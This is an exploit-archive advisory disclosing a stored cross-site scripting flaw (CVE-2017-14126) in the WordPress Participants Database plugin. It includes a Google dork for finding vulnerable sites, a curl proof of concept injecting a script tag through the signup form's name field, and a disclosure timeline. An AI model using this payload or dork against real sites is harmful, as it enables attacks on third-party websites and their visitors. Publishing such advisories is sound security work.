WordPress Plugin Participants Database < - Cross-Site Scripting

2017-09-01 18:05:16

# Exploit Title: Wordpress Plugin Participants Database < - XSS
# Google Dork: inurl:wp-content/plugins/participants-database/
# Date: 01-Sep-17
# Exploit Author: Benjamin Lim
# Vendor Homepage: https://xnau.com/
# Software Link: https://wordpress.org/plugins/participants-database/
# Version:
# Tested on: Kali Linux 2.0
# CVE : CVE-2017-14126

1. Product & Service Introduction:
Participants Database is a Wordpress plugin for managing a database of
participants, members or volunteers. As of now, the plugin has been
downloaded 320,000 times and has 10,000+ active installs.

2. Technical Details & Description:
Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.
The XSS vulnerability is found on the participant signup form input
textfield. The get_field_value_display() function in
PDb_FormElement.class.php did not escape HTML special characters, allowing
an attacker to input javascript. The XSS code will be executed on 2 pages.

1) The "Thank you for signing up" page immediately after submitting the
2) The page which is configured to output the list of participants with the
[pdb_list] shortcode.

3. Proof of Concept (PoC):

curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys= -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ef8a828e8683d28eaf8ec18c8082">[email protected]</a> -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

To trigger manually, browse to the page, input the following in the form
and click Sign Up.

First Name: <script>alert("1");</script>
Last Name: test
Email: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c4b0a1b7b084b0a1b7b0eaa7aba9">[email protected]</a>

4. Mitigation
Update to version

5. Disclosure Timeline
2017/09/01 Vendor contacted
2017/09/02 Vendor responded
2017/09/03 Update released
2017/09/06 Advisory released to the public

6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]

*Benjamin Lim*
E: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3c515d55507c5055515e5952565d515552125f5351">[email protected]</a>
PGP : https://limbenjamin.com/pgp
<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>


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